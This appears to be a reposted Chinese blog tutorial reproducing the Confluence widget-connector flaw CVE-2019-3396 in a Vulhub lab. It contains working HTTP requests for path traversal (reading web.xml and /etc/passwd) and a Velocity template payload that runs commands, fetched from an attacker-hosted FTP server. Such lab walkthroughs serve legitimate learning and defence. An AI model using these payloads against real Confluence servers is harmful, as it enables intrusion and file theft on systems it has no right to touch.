本文主要是介绍Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
- 00.前言
- 01.Atlassian Confluence 简介
- 02.漏洞描述
- 03.漏洞复现
- **0x01安装**
- **0x02.漏洞复现**
00.前言
这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺
01.Atlassian Confluence 简介
Atlassian Confluence(简称Confluence)是一个专业的wiki程序(是一种在网络上开放且可供多人协同创作的超文本系统)。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。
Confluence 不是一个开源软件,非商业用途可以免费使用。
其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息,文档协作,集体讨论;目前,Confluence被用于广泛地用于项目团队,开发团队,市场销售团队。
02.漏洞描述
在Widget连接器中的Confluence Server和Data Center中存在一个服务器端模板注入漏洞。 攻击者可以利用此问题在运行漏洞版本的Confluence Server或Data Center的系统上实现服务器端模板注入,路径遍历和远程代码执行。
6.6.12之前的版本,从6.12.3之前的6.7.0版本(6.12.x的固定版本)到6.13.3之前的版本6.13.0(6.13的固定版本)的所有版本的Confluence Server和Confluence数据中心。 x)和6.14.2之前的6.14.0版本(6.14.x的固定版本)开始。
参考:https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
原理:https://paper.seebug.org/884/
03.漏洞复现
靶机ip:192.168.10.139,os:Ubuntu 16.04 LTS
攻击主机:ip:192.168.10.131, os:Win7,工具:burpsuite
老样子:首先,在vulhub-master中漏洞的相应位置打开终端,输入docker-compose up -d打开环境:
docker-compose up -d
然后输入docker ps查看环境是否打开成功:
docker ps
成功后接下来便可以开始漏洞的复现了。访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons):
0x01安装
1:选择“Trial installation”
2:点击“Get an evaluation license”
3:申请一个Confluence Server的测试证书(不要选择Data Center和Addons)
4:申请的时候比较慢,将KEY复制并粘贴到登录页,然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。
5:如果提示填写cluster node,路径填写 /home/confluence即可
6:继续填写数据库账号密码,选择postgres数据库,地址为 db,账号密码均为 postgres
7:接下来的内容随意选择填写···
0x02.漏洞复现
路径穿越:
发送如下数据包即可读取文件 web.xml
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:靶机_ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://靶机_ip:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
可以看出成功读取web.xml~
6.12以前的Confluence没有限制文件读取的协议和路径,修改请求中_template参数的值,即可实现本地文件包含,我们可以使用 file:///etc/passwd来读取文件 :
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:靶机_ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://靶机_ip:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}
远程代码执行漏洞:
修改请求中_template参数的值,可以包含远程文件,支持https协议,http目前无法利用 。
先在根目录下添加一个 r.vm文件,内容:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())$scan.next()
#end
然后开一个简单的ftp服务器,我看到很多文章中用的攻击机都是kali,可以很方便地使用python启动服务:
python -m pip install pyftpdlib
python -m pyftplib -p 21
那win7就麻烦一点但也很简单参考一下百度就好:
https://www.cnblogs.com/acode/p/5420709.html
(其中一步:身份验证,选择匿名就可!)
修改_ template参数的值为 ftp://192.168.10.131:21(攻击机ip:其端口)/r.vm并在其后加入 command值,设置为 id:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://192.168.10.131:21/r.vm","command":"id"}}}
成功执行命令,复现成功~
修复建议
升级Confluence版本即可
结束语:这是抬锅整理出来的复现过程希望能对大家有帮助☺
参考:https://www.cnblogs.com/-Anguvia-/p/14618509.html
这篇关于Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
